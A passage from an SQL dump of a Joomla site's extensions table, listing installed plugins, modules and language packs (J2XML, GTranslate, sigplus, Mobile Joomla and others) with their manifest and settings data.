reserved.\",\"authorEmail\":\"info@eshiol.it\",\"authorUrl\":\"www.eshiol.it\",\"version\":\"14.2.10\",\"description\":\"LIB_ESHIOL_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10071,'J2XML','library','j2xml','',0,1,1,0,'{\"legacy\":false,\"name\":\"J2XML\",\"type\":\"library\",\"creationDate\":\"March 2014\",\"author\":\"Helios Ciancio\",\"copyright\":\"(C) 2010-2014, Helios Ciancio. All rights reserved.\",\"authorEmail\":\"info@eshiol.it\",\"authorUrl\":\"www.eshiol.it\",\"version\":\"14.3.237\",\"description\":\"LIB_J2XML_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10072,'com_j2xml','component','com_j2xml','',1,1,0,0,'{\"legacy\":false,\"name\":\"COM_J2XML\",\"type\":\"component\",\"creationDate\":\"September 2013\",\"author\":\"Helios Ciancio\",\"copyright\":\"(C) 2010-2013, Helios Ciancio. All rights reserved.\",\"authorEmail\":\"info@eshiol.it\",\"authorUrl\":\"www.eshiol.it\",\"version\":\"3.1.115\",\"description\":\"COM_J2XML_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10073,'PLG_SYSTEM_J2XML','plugin','j2xml','system',0,0,1,0,'{\"legacy\":false,\"name\":\"PLG_SYSTEM_J2XML\",\"type\":\"plugin\",\"creationDate\":\"September 2013\",\"author\":\"Helios Ciancio\",\"copyright\":\"(C) 2010-2013, Helios Ciancio. All rights reserved.\",\"authorEmail\":\"info@eshiol.it\",\"authorUrl\":\"www.eshiol.it\",\"version\":\"3.1.30\",\"description\":\"PLG_SYSTEM_J2XML_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10074,'CLI_J2XML','file','j2xml','',0,1,0,0,'{\"legacy\":false,\"name\":\"CLI_J2XML\",\"type\":\"file\",\"creationDate\":\"March 2014\",\"author\":\"Helios Ciancio\",\"copyright\":\"(C) 2010-2014, Helios Ciancio. All rights reserved.\",\"authorEmail\":\"info@eshiol.it\",\"authorUrl\":\"www.eshiol.it\",\"version\":\"3.1.6\",\"description\":\"CLI_J2XML_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10075,'j2xml','package','pkg_j2xml','',0,1,1,0,'{\"legacy\":false,\"name\":\"J2XML\",\"type\":\"package\",\"creationDate\":\"March 2014\",\"author\":\"Helios Ciancio\",\"copyright\":\"\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"3.1\",\"description\":\"Package installer for J2XML\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10076,'PLG_J2XML_IMPORTER15','plugin','importer15','j2xml',0,1,1,0,'{\"legacy\":false,\"name\":\"PLG_J2XML_IMPORTER15\",\"type\":\"plugin\",\"creationDate\":\"September 2013\",\"author\":\"Helios Ciancio\",\"copyright\":\"(C) 2013, Helios Ciancio. All rights reserved.\",\"authorEmail\":\"info@eshiol.it\",\"authorUrl\":\"www.eshiol.it\",\"version\":\"3.1.18\",\"description\":\"PLG_J2XML_IMPORTER15_XML_DESCRIPTION\",\"group\":\"\"}','{\"timezone-12\":\"Pacific\\/Midway\",\"timezone-11\":\"Pacific\\/Midway\",\"timezone-10\":\"Pacific\\/Honolulu\",\"timezone-95\":\"Pacific\\/Marquesas\",\"timezone-9\":\"America\\/Adak\",\"timezone-8\":\"America\\/Nome\",\"timezone-7\":\"America\\/Los_Angeles\",\"timezone-6\":\"America\\/Mexico_City\",\"timezone-5\":\"America\\/Bogota\",\"timezone-45\":\"America\\/Caracas\",\"timezone-4\":\"America\\/Detroit\",\"timezone-35\":\"America\\/St_Johns\",\"timezone-3\":\"America\\/Sao_Paulo\",\"timezone-2\":\"Atlantic\\/South_Georgia\",\"timezone-1\":\"Atlantic\\/Azores\",\"timezone0\":\"Europe\\/London\",\"timezone1\":\"Europe\\/Rome\",\"timezone2\":\"Europe\\/Istanbul\",\"timezone3\":\"Asia\\/Baghdad\",\"timezone35\":\"Asia\\/Tehran\",\"timezone4\":\"Asia\\/Muscat\",\"timezone45\":\"Asia\\/Kabul\",\"timezone5\":\"Asia\\/Karachi\",\"timezone55\":\"Asia\\/Colombo\",\"timezone575\":\"Asia\\/Kathmandu\",\"timezone6\":\"Asia\\/Almaty\",\"timezone65\":\"Asia\\/Rangoon\",\"timezone9\":\"Asia\\/Tokyo\",\"timezone95\":\"Australia\\/Adelaide\",\"timezone10\":\"Pacific\\/Guam\",\"timezone105\":\"Australia\\/Lord_Howe\",\"timezone11\":\"Asia\\/Magadan\",\"timezone115\":\"Pacific\\/Norfolk\",\"timezone12\":\"Pacific\\/Auckland\",\"timezone1275\":\"Pacific\\/Chatham\",\"timezone13\":\"Pacific\\/Tongatapu\",\"timezone14\":\"Pacific\\/Kiritimati\"}','','',0,'0000-00-00 00:00:00',0,0),(10077,'LithuanianLt','language','lt-LT','',0,1,0,0,'{\"legacy\":true,\"name\":\"Lithuanian (Lt)\",\"type\":\"language\",\"creationDate\":\"2012.09.05\",\"author\":\"Lithuanian translation team : joomla123.lt\",\"copyright\":\"Copyright (C) 2005 - 2012 Open Source Matters.\",\"authorEmail\":\"info@joomla123.lt\",\"authorUrl\":\"http:\\/\\/www.joomla123.lt\",\"version\":\"2.5.7.1\",\"description\":\"Lithuanian language pack for Joomla! 2.5\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10078,'LithuanianLt','language','lt-LT','',1,1,0,0,'{\"legacy\":true,\"name\":\"Lithuanian (Lt)\",\"type\":\"language\",\"creationDate\":\"2012.09.05\",\"author\":\"Lithuanian translation team : joomla123.lt\",\"copyright\":\"Copyright (C) 2005 - 2012 Open Source Matters.\",\"authorEmail\":\"info@joomla123.lt\",\"authorUrl\":\"http:\\/\\/www.joomla123.lt\",\"version\":\"2.5.7.1\",\"description\":\"Lithuanian language pack for Joomla! 2.5\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10079,'lt-LT','package','pkg_lt-LT','',0,1,1,0,'{\"legacy\":false,\"name\":\"Lithuanian Language Pack\",\"type\":\"package\",\"creationDate\":\"2012.09.05\",\"author\":\"joomla123.lt\",\"copyright\":\"\",\"authorEmail\":\"info@joomla123.lt\",\"authorUrl\":\"http:\\/\\/www.joomla123.lt\",\"version\":\"2.5.7.1\",\"description\":\"2.5.7 Joomla Lithuanian Language Package\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10080,'MOD_FACEBOOKLIKE','module','mod_facebooklike','',0,1,0,0,'{\"legacy\":false,\"name\":\"MOD_FACEBOOKLIKE\",\"type\":\"module\",\"creationDate\":\"February 2011\",\"author\":\"Martiinkolle.dk\",\"copyright\":\"Copyright (C) 2012 Martiinkolle.dk and KMweb.dk. All rights reserved.\",\"authorEmail\":\"martiinkolle@gmail.com\",\"authorUrl\":\"http:\\/\\/martiinkolle.dk\",\"version\":\"1.4.9.1\",\"description\":\"\\n\\nFacebook like button for Joomla 2.5\\n\\n\\t\",\"group\":\"\"}','{\"autoDetectUrl\":\"1\",\"url\":\"\",\"action\":\"like\",\"loadAsWhat\":\"2\",\"showPictures\":\"true\",\"send\":\"1\",\"zindex\":\"0\",\"width\":\"100%\",\"height\":\"\",\"layout\":\"standard\",\"colorScheme\":\"light\",\"font\":\"arial\",\"moduleclass_sfx\":\"\",\"loadApi\":\"1\",\"httpsOrNot\":\"1\",\"language\":\"\",\"type\":\"website\"}','','',0,'0000-00-00 00:00:00',0,0),(10081,'plg_vombiefacebooklike','plugin','vombiefacebooklike','system',0,0,1,0,'{\"legacy\":false,\"name\":\"plg_vombiefacebooklike\",\"type\":\"plugin\",\"creationDate\":\"March 2012\",\"author\":\"Martin Kollerup\",\"copyright\":\"(C) 2012 Copyright Martiinkolle.dk\",\"authorEmail\":\"martin.kollerup@gmail.com\",\"authorUrl\":\"http:\\/\\/matiinkolle.dk\",\"version\":\"1.4.9\",\"description\":\"Integration of open graph for mod_facebooklike\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10082,'facebooklike','package','pkg_facebooklike','',0,1,1,0,'{\"legacy\":false,\"name\":\"Facebook Like\",\"type\":\"package\",\"creationDate\":\"January 2012\",\"author\":\"Martin Kollerup\",\"copyright\":\"\",\"authorEmail\":\"martiinkolle@gmail.com\",\"authorUrl\":\"martiinkolle.dk\",\"version\":\"1.4.9.1\",\"description\":\"Facebook Like Button for Joomla. This package is installing a module and a plugin\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10083,'Google Calendar Plugin','plugin','googlecalendar','content',0,1,1,0,'{\"legacy\":false,\"name\":\"Google Calendar Plugin\",\"type\":\"plugin\",\"creationDate\":\"February, 2012\",\"author\":\"Jan Maat\",\"copyright\":\"This extension in released under the GNU\\/GPL License -\\n\\t\\thttp:\\/\\/www.gnu.org\\/copyleft\\/gpl.html\",\"authorEmail\":\"jenj.maat@gmail.com\",\"authorUrl\":\"\",\"version\":\"0.2\",\"description\":\"PLG_CONTENT_GOOGLECALENDAR_DESCRIPTION\",\"group\":\"\"}','{\"code\":\"<iframe src=\\\"http:\\/\\/www.google.com\\/calendar\\/embed?src=kalendorius%40infotytuvenai.lt&ctz=Europe\\/Vilnius\\\" style=\\\"border: 0\\\" width=\\\"1190\\\" height=\\\"800\\\" frameborder=\\\"0\\\" scrolling=\\\"no\\\"><\\/iframe>\"}','','',135,'2014-05-20 05:22:32',0,0),(10084,'GoogleCalendar','module','mod_googlecalendar','',0,1,0,0,'{\"legacy\":false,\"name\":\"GoogleCalendar\",\"type\":\"module\",\"creationDate\":\"February 2012\",\"author\":\"Jan Maat\",\"copyright\":\"Copyright (C) 2012 Jan Maat All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"0.0\",\"description\":\"MOD_GOOGLECALENDAR_DESCRIPTION\",\"group\":\"\"}','[]','','',0,'0000-00-00 00:00:00',0,0),(10085,'Simple Image Gallery (by JoomlaWorks)','plugin','jw_sig','content',0,0,1,0,'{\"legacy\":false,\"name\":\"Simple Image Gallery (by JoomlaWorks)\",\"type\":\"plugin\",\"creationDate\":\"May 27th, 2013\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2013 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"3.0.0\",\"description\":\"JW_PLG_SIG_XML_DESC\",\"group\":\"\"}','{\"galleries_rootfolder\":\"images\",\"jQueryHandling\":\"1.8\",\"thb_width\":\"200\",\"thb_height\":\"160\",\"jpg_quality\":\"80\",\"cache_expire_time\":\"1440\",\"memoryLimit\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10086,'Content - Image gallery - sigplus','plugin','sigplus','content',0,1,1,0,'{\"legacy\":false,\"name\":\"Content - Image gallery - sigplus\",\"type\":\"plugin\",\"creationDate\":\"Dec 06, 2013\",\"author\":\"Levente Hunyadi\",\"copyright\":\"\\u00a9 2009-2011 Levente Hunyadi. All rights reserved.\",\"authorEmail\":\"hunyadi@gmail.com\",\"authorUrl\":\"http:\\/\\/hunyadi.info.hu\\/projects\\/sigplus\",\"version\":\"1.4.2.17\",\"description\":\"SIGPLUS_DESCRIPTION\",\"group\":\"\"}','{\"base_folder\":\"images\",\"layout\":\"flow\",\"rows\":\"1\",\"cols\":\"3\",\"thumb_count\":\"0\",\"thumb_width\":\"200\",\"thumb_height\":\"200\",\"thumb_crop\":\"0\",\"alignment\":\"before-clear\",\"lightbox\":\"fancybox\",\"lightbox_slideshow\":\"0\",\"slider\":\"boxplus.slider\",\"slider_orientation\":\"horizontal\",\"slider_navigation\":\"bottom\",\"slider_buttons\":\"0\",\"slider_links\":\"0\",\"slider_counter\":\"0\",\"slider_overlay\":\"1\",\"slider_duration\":\"800\",\"slider_animation\":\"0\",\"captions\":\"none\",\"caption_title\":\"\",\"caption_description\":\"\",\"download\":\"0\",\"metadata\":\"0\",\"margin\":\"3\",\"border_style\":\"double\",\"border_width\":\"\",\"border_color\":\"\",\"padding\":\"\",\"thumb_cache\":\"0\",\"thumb_folder\":\"thumbs\",\"preview_folder\":\"preview\",\"fullsize_folder\":\"fullsize\",\"base_url\":\"\",\"thumb_quality\":\"85\",\"labels\":\"labels\",\"labels_multilingual\":\"0\",\"sort_criterion\":\"labels-filename\",\"sort_order\":\"0\",\"linkage\":\"inline\",\"ajaxapi\":\"default\",\"library\":\"default\",\"activationtag\":\"gallery\",\"debug\":\"0\",\"settings\":\"\"}','','',135,'2021-01-30 20:24:54',0,0),(10087,'sigplus','module','mod_sigplus','',0,1,0,0,'{\"legacy\":false,\"name\":\"sigplus\",\"type\":\"module\",\"creationDate\":\"Dec 06, 2013\",\"author\":\"Levente Hunyadi\",\"copyright\":\"\\u00a9 2009-2011 Levente Hunyadi. All rights reserved.\",\"authorEmail\":\"hunyadi@gmail.com\",\"authorUrl\":\"http:\\/\\/hunyadi.info.hu\\/projects\\/sigplus\",\"version\":\"1.4.2.17\",\"description\":\"SIGPLUS_DESCRIPTION\",\"group\":\"\"}','{\"images_folder\":\"images\\/sampledata\\/fruitshop\",\"layout\":\"fixed\",\"rows\":\"1\",\"cols\":\"1\",\"thumb_count\":\"0\",\"thumb_width\":\"200\",\"thumb_height\":\"200\",\"thumb_crop\":\"0\",\"alignment\":\"center\",\"lightbox\":\"boxplus\\/lightsquare\",\"lightbox_slideshow\":\"0\",\"slider\":\"boxplus.slider\",\"slider_orientation\":\"vertical\",\"slider_navigation\":\"bottom\",\"slider_buttons\":\"0\",\"slider_links\":\"0\",\"slider_counter\":\"0\",\"slider_overlay\":\"1\",\"slider_duration\":\"800\",\"slider_animation\":\"0\",\"download\":\"0\",\"metadata\":\"0\",\"margin\":\"\",\"border_style\":\"\",\"border_width\":\"\",\"border_color\":\"\",\"padding\":\"\",\"thumb_cache\":\"1\",\"thumb_folder\":\"thumbs\",\"preview_folder\":\"preview\",\"fullsize_folder\":\"fullsize\",\"base_url\":\"\",\"thumb_quality\":\"85\",\"labels\":\"labels\",\"labels_multilingual\":\"0\",\"sort_criterion\":\"labels-filename\",\"sort_order\":\"0\",\"linkage\":\"inline\",\"ajaxapi\":\"default\",\"library\":\"default\",\"moduleclass_sfx\":\"\",\"debug\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10088,'sigplus','package','pkg_sigplus','',0,1,1,0,'{\"legacy\":false,\"name\":\"sigplus\",\"type\":\"package\",\"creationDate\":\"Dec 06, 2013\",\"author\":\"Levente Hunyadi\",\"copyright\":\"\\u00a9 2009-2011 Levente Hunyadi. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"http:\\/\\/hunyadi.info.hu\\/projects\\/sigplus\",\"version\":\"1.4.2.17\",\"description\":\"\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10090,'com_jalang','component','com_jalang','',1,1,0,0,'{\"legacy\":false,\"name\":\"com_jalang\",\"type\":\"component\",\"creationDate\":\"12 Dec 2013\",\"author\":\"JoomlArt\",\"copyright\":\"Copyright (C), J.O.O.M Solutions Co., Ltd. All Rights Reserved.\",\"authorEmail\":\"webmaster@joomlart.com\",\"authorUrl\":\"www.joomlart.com\",\"version\":\"1.0.3\",\"description\":\"\\n\\t\\n\\t<div align=\\\"left\\\">\\n    <h1><img border=\'0\' alt=\'JA Multi Language Component for Joomla! 2.5 & Joomla! 3.x\' src=\'http:\\/\\/asset.joomlart.com\\/images\\/stories\\/extensions\\/joomla\\/multi-language-icon.png\' style=\'float: left\'>JA Multi Language Component for Joomla! 2.5 & Joomla! 3.2<\\/h1>\\n    <div style=\'font-weight: normal\'>\\n        <p><span style=\'color: #ff6600;\'><strong>Features:<\\/strong><\\/span>\\n         This component aims to support for multi langual site. It puts the translating process at ease for all content types: Category, Article, Module, Menu ... from selected language to others.<\\/p>\\n        <br\\/><br\\/>\\n        <strong><span style=\'color: #ff0000;\'>Usage Instructions:<\\/span><\\/strong><br \\/>\\n        <ul>\\n            <li>Get the component installed in your site<\\/li>\\n            <li>Add your Bing API: Client ID and Client Secret Key<\\/li>\\n            <li>Select langauge to translate from<\\/li>\\n            <li>Select langauges to be translated to<\\/li>\\n            <li>Enable plugin System - Language Filter and module Language Switcher<\\/li>\\n        <\\/ul>\\n        <strong><span style=\'color: #ff0000;\'>Upgrade Methods:<\\/span><br \\/><\\/strong>\\n        <ul>\\n            <li>You can overwrite a new version of this extension overthe existing one with JA Extension Manager component. The uninstallation of the older version is not required. <\\/li>\\n            <li>Please remember to always back up any customized files before proceed toward any upgrades.<\\/li>\\n        <\\/ul>\\n        <span style=\'color: #008000;\'><strong>Links:<\\/strong><\\/span><br \\/>\\n        <ul>\\n         <li><a target=\\\"_blank\\\" href=\\\"http:\\/\\/joomlart.com\\/documentation\\/joomla-component\\/ja-multilingual\\\">Documentation<\\/a><\\/li>\\n\\t\\t <li><a target=\'_blank\' href=\\\"http:\\/\\/update.joomlart.com\\/\\\">Updates &amp; Versions<\\/a><\\/li>\\n\\t\\t <li><a target=\'_blank\' href=\\\"http:\\/\\/pm.joomlart.com\\/browse\\/JAECLANG\\\">Changelog<\\/a><\\/li>\\n\\t\\t <li><a target=\'_blank\' href=\\\"http:\\/\\/www.joomlart.com\\/forums\\/forumdisplay.php?512-JA-Multilingual-Component\\\">Get Support<\\/a><\\/li>\\n\\t\\t<\\/ul>\\n\\t\\t<p>Copyright 2004 - 2013 <a href=\\\"http:\\/\\/www.joomlart.com\\/\\\" title=\\\"Visit Joomlart.com!\\\">JoomlArt.com<\\/a>.<\\/p>\\n\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\n\\t\",\"group\":\"\"}','{\"translator_api_active\":\"google\",\"bing_client_id\":\"\",\"bing_client_secret\":\"\",\"google_browser_api_key\":\"\",\"k2_clone_image\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10091,'GTranslate','module','mod_gtranslate','',0,1,0,0,'{\"legacy\":false,\"name\":\"GTranslate\",\"type\":\"module\",\"creationDate\":\"September 2010\",\"author\":\"Edvard Ananyan\",\"copyright\":\"Copyright (C) 2008 - 2016 Edvard Ananyan. All rights reserved.\",\"authorEmail\":\"edo888@gmail.com\",\"authorUrl\":\"https:\\/\\/gtranslate.io\",\"version\":\"3.0.38\",\"description\":\"\\n    \\n    <span style=\'font-weight:normal;text-align:left;font-size:120%;line-height:1.5;\'>\\n    <p>GTranslate - Makes your website multilingual and available to the world.<\\/p>\\n    <p><i>Ugrade your <a href=\\\"https:\\/\\/gtranslate.io\\/?xyz=997#pricing\\\" target=\\\"_blank\\\">GTranslate<\\/a> to a paid plan and enable the following features:<\\/i><\\/p>\\n    <ul>\\n        <li><strong>Enable search engine indexing<\\/strong> - Search engines will index your translated pages which will increase international traffic.<\\/li>\\n        <li><strong>Search engine friendly<\\/strong> - The URL will change depending on a selected language e.g. <b>es.domain.com<\\/b> or <b>domain.com\\/es\\/<\\/b> for Spanish.<\\/li>\\n        <li><strong>Meta data translation<\\/strong> - Meta keywords and description will be translated which will increase translated keywords ranking in the search engines.<\\/li>\\n        <li><strong>Ability to edit translations<\\/strong> - You will be able to edit the translated texts directly from the front-end.<\\/li>\\n        <li><strong>Cache support<\\/strong> - Translations will be cached and make your translated pages to load faster.<\\/li>\\n        <li><strong><a href=\\\"https:\\/\\/gtranslate.io\\/#faq\\\" target=\\\"_blank\\\">Translation Delivery Network<\\/a><\\/strong> - The translations will be delivered by our cloud network. No software is installed on your server.<\\/li>\\n        <li><strong>Centralized translation cache<\\/strong> - The quality of the translations cache will improve over time by using crowd sourced and professional translations.<\\/li>\\n        <li><strong>Seamless updates<\\/strong> - We care about further updates. You just enjoy the up to date service every day.<\\/li>\\n        <li><strong>URL Translation<\\/strong> - The URL will be translated which is very important for multilingual SEO.<\\/li>\\n        <li><strong>Ability to edit translated URLs<\\/strong> - You will be able to change the translated URL manually.<\\/li>\\n        <li><strong>Language hosting<\\/strong> - Host your language on top level country domain name to rank higher on local search engines results (ccTLD <b>domain.es<\\/b>).<\\/li>\\n    <\\/ul>\\n\\n    <p><a href=\'https:\\/\\/gtranslate.io\\/docs\\/54-joomla-module-documentation\' target=\'_blank\' class=\'btn btn-large btn-info\'><i class=\'icon-support\'><\\/i> Documentation<\\/a> &nbsp; <a href=\'http:\\/\\/extensions.joomla.org\\/extensions\\/extension\\/languages\\/automatic-translations\\/gtranslate#reviews\' target=\'_blank\' class=\'btn btn-large btn-warning\'><i class=\'icon-comments\'><\\/i> Reviews<\\/a><\\/p>\\n    <p><b>Version: 3.0.38<\\/b><br\\/>Copyright &copy; 2008 - 2016 Edvard Ananyan, All rights reserved. <a href=\'https:\\/\\/gtranslate.io\' target=\'_blank\'><b>http:\\/\\/gtranslate.io<\\/b><\\/a><\\/p>\\n    <\\/span>\\n    \\n    \",\"group\":\"\"}','{\"moduleclass_sfx\":\"\",\"look\":\"both\",\"language\":\"en\",\"pro_version\":\"0\",\"enterprise_version\":\"0\",\"flag_size\":\"16\",\"new_tab\":\"0\",\"analytics\":\"0\",\"show_af\":\"1\",\"show_sq\":\"1\",\"show_ar\":\"1\",\"show_hy\":\"1\",\"show_az\":\"1\",\"show_eu\":\"1\",\"show_be\":\"1\",\"show_bg\":\"1\",\"show_ca\":\"1\",\"show_zh-CN\":\"1\",\"show_zh-TW\":\"1\",\"show_hr\":\"1\",\"show_cs\":\"1\",\"show_da\":\"1\",\"show_nl\":\"1\",\"show_en\":\"2\",\"show_et\":\"1\",\"show_tl\":\"1\",\"show_fi\":\"1\",\"show_fr\":\"2\",\"show_gl\":\"1\",\"show_ka\":\"1\",\"show_de\":\"2\",\"show_el\":\"1\",\"show_ht\":\"1\",\"show_iw\":\"1\",\"show_hi\":\"1\",\"show_hu\":\"1\",\"show_is\":\"1\",\"show_id\":\"1\",\"show_ga\":\"1\",\"show_it\":\"2\",\"show_ja\":\"1\",\"show_ko\":\"1\",\"show_lv\":\"1\",\"show_lt\":\"1\",\"show_mk\":\"1\",\"show_ms\":\"1\",\"show_mt\":\"1\",\"show_no\":\"1\",\"show_fa\":\"1\",\"show_pl\":\"1\",\"show_pt\":\"2\",\"show_ro\":\"1\",\"show_ru\":\"2\",\"show_sr\":\"1\",\"show_sk\":\"1\",\"show_sl\":\"1\",\"show_es\":\"2\",\"show_sw\":\"1\",\"show_sv\":\"1\",\"show_th\":\"1\",\"show_tr\":\"1\",\"show_uk\":\"1\",\"show_ur\":\"1\",\"show_vi\":\"1\",\"show_cy\":\"1\",\"show_yi\":\"1\",\"show_bn\":\"0\",\"show_bs\":\"0\",\"show_ceb\":\"0\",\"show_eo\":\"0\",\"show_gu\":\"0\",\"show_ha\":\"0\",\"show_hmn\":\"0\",\"show_ig\":\"0\",\"show_jw\":\"0\",\"show_kn\":\"0\",\"show_km\":\"0\",\"show_lo\":\"0\",\"show_la\":\"0\",\"show_mi\":\"0\",\"show_mr\":\"0\",\"show_mn\":\"0\",\"show_ne\":\"0\",\"show_pa\":\"0\",\"show_so\":\"0\",\"show_ta\":\"0\",\"show_te\":\"0\",\"show_yo\":\"0\",\"show_zu\":\"0\",\"show_my\":\"0\",\"show_ny\":\"0\",\"show_kk\":\"0\",\"show_mg\":\"0\",\"show_ml\":\"0\",\"show_si\":\"0\",\"show_st\":\"0\",\"show_su\":\"0\",\"show_tg\":\"0\",\"show_uz\":\"0\",\"show_am\":\"0\",\"show_co\":\"0\",\"show_haw\":\"0\",\"show_ku\":\"0\",\"show_ky\":\"0\",\"show_ld\":\"0\",\"show_ps\":\"0\",\"show_sm\":\"0\",\"show_gd\":\"0\",\"show_sn\":\"0\",\"show_sd\":\"0\",\"show_fy\":\"0\",\"show_xh\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}','','',0,'0000-00-00 00:00:00',0,0),(10092,'mobilejoomla','component','com_mobilejoomla','',1,1,0,0,'{\"legacy\":false,\"name\":\"mobilejoomla\",\"type\":\"component\",\"creationDate\":\"March 2022\",\"author\":\"Mobile Joomla!\",\"copyright\":\"(C) 2008-2022 Kuneri Ltd. \\/ Denis Ryabov\",\"authorEmail\":\"hello@mobilejoomla.com\",\"authorUrl\":\"https:\\/\\/www.mobilejoomla.com\",\"version\":\"2.1.51\",\"description\":\"\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10093,'Mobile - Proxy Module','module','mod_mj_proxymodule','',0,1,0,0,'{\"legacy\":false,\"name\":\"Mobile - Proxy Module\",\"type\":\"module\",\"creationDate\":\"March 2022\",\"author\":\"Mobile Joomla!\",\"copyright\":\"(C) 2008-2022 Kuneri Ltd. \\/ Denis Ryabov\",\"authorEmail\":\"hello@mobilejoomla.com\",\"authorUrl\":\"https:\\/\\/www.mobilejoomla.com\",\"version\":\"2.1.51\",\"description\":\"Displays copy of a module.\",\"group\":\"\"}','{\"module_id\":\"0\",\"moduleclass_sfx\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10094,'Mobile - Proxy Position','module','mod_mj_proxyposition','',0,1,0,0,'{\"legacy\":false,\"name\":\"Mobile - Proxy Position\",\"type\":\"module\",\"creationDate\":\"March 2022\",\"author\":\"Mobile Joomla!\",\"copyright\":\"(C) 2008-2022 Kuneri Ltd. \\/ Denis Ryabov\",\"authorEmail\":\"hello@mobilejoomla.com\",\"authorUrl\":\"https:\\/\\/www.mobilejoomla.com\",\"version\":\"2.1.51\",\"description\":\"Displays module position as a module.\",\"group\":\"\"}','{\"position\":\"\",\"moduleclass_sfx\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10095,'Mobile - Mobile Switcher','module','mod_mj_switcher','',0,1,0,0,'{\"legacy\":false,\"name\":\"Mobile - Mobile Switcher\",\"type\":\"module\",\"creationDate\":\"March 2022\",\"author\":\"Mobile Joomla!\",\"copyright\":\"(C) 2008-2022 Kuneri Ltd. \\/ Denis Ryabov\",\"authorEmail\":\"hello@mobilejoomla.com\",\"authorUrl\":\"https:\\/\\/www.mobilejoomla.com\",\"version\":\"2.1.51\",\"description\":\"Allows user to change between mobile and desktop versions.\",\"group\":\"\"}','{\"hide_on_pc\":\"1\",\"@spacer\":\"\",\"show_text\":\"\",\"show_choosen\":\"0\",\"auto_show\":\"0\",\"auto_text\":\"Auto-Detect Version\",\"mobile_show\":\"1\",\"mobile_text\":\"Mobile Version\",\"web_show\":\"1\",\"web_text\":\"Desktop Version\",\"moduleclass_sfx\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10096,'System - Mobile Core','plugin','mobilejoomla','system',0,1,1,0,'{\"legacy\":false,\"name\":\"System - Mobile Core\",\"type\":\"plugin\",\"creationDate\":\"March 2022\",\"author\":\"Mobile Joomla!\",\"copyright\":\"(C) 2008-2022 Kuneri Ltd. \\/ Denis Ryabov\",\"authorEmail\":\"hello@mobilejoomla.com\",\"authorUrl\":\"https:\\/\\/www.mobilejoomla.com\",\"version\":\"2.1.51\",\"description\":\"System Mobile Joomla! extension plugin\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',-99,0),(10097,'System - Mobile Page Optimizer','plugin','mobilejoomlaopt','system',0,1,1,0,'{\"legacy\":false,\"name\":\"System - Mobile Page Optimizer\",\"type\":\"plugin\",\"creationDate\":\"March 2022\",\"author\":\"Mobile Joomla!\",\"copyright\":\"(C) 2008-2022 Kuneri Ltd. \\/ Denis Ryabov\",\"authorEmail\":\"hello@mobilejoomla.com\",\"authorUrl\":\"https:\\/\\/www.mobilejoomla.com\",\"version\":\"2.1.51\",\"description\":\"Mobile Page Optimizer plugin\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',9,0),(10098,'Mobile - Simple','plugin','simple','mobile',0,1,1,0,'{\"legacy\":false,\"name\":\"Mobile - Simple\",\"type\":\"plugin\",\"creationDate\":\"March 2022\",\"author\":\"Mobile Joomla!\",\"copyright\":\"(C) 2008-2022 Kuneri Ltd. \\/ Denis Ryabov\",\"authorEmail\":\"hello@mobilejoomla.com\",\"authorUrl\":\"https:\\/\\/www.mobilejoomla.com\",\"version\":\"2.1.51\",\"description\":\"Basic device checker\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',7,0),(10099,'Mobile - Forever','plugin','always','mobile',0,1,1,0,'{\"legacy\":false,\"name\":\"Mobile - Forever\",\"type\":\"plugin\",\"creationDate\":\"March 2022\",\"author\":\"Mobile Joomla!\",\"copyright\":\"(C) 2008-2022 Kuneri Ltd. \\/ Denis Ryabov\",\"authorEmail\":\"hello@mobilejoomla.com\",\"authorUrl\":\"https:\\/\\/www.mobilejoomla.com\",\"version\":\"2.1.51\",\"description\":\"PLG_MOBILE_ALWAYS__PERSITENT_MOBILE_MARKUP\",\"group\":\"\"}','{\"markup\":\"\"}','','',0,'0000-00-00 00:00:00',8,0),(10100,'Mobile - Domains','plugin','domains','mobile',0,1,1,0,'{\"legacy\":false,\"name\":\"Mobile - Domains\",\"type\":\"plugin\",\"creationDate\":\"March 2022\",\"author\":\"Mobile Joomla!\",\"copyright\":\"(C) 2008-2022 Kuneri Ltd. \\/ Denis Ryabov\",\"authorEmail\":\"hello@mobilejoomla.com\",\"authorUrl\":\"https:\\/\\/www.mobilejoomla.com\",\"version\":\"2.1.51\",\"description\":\"Mobile domains support\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',9,0),(10101,'Mobile - AMDD','plugin','amdd','mobile',0,1,1,0,'{\"legacy\":false,\"name\":\"Mobile - 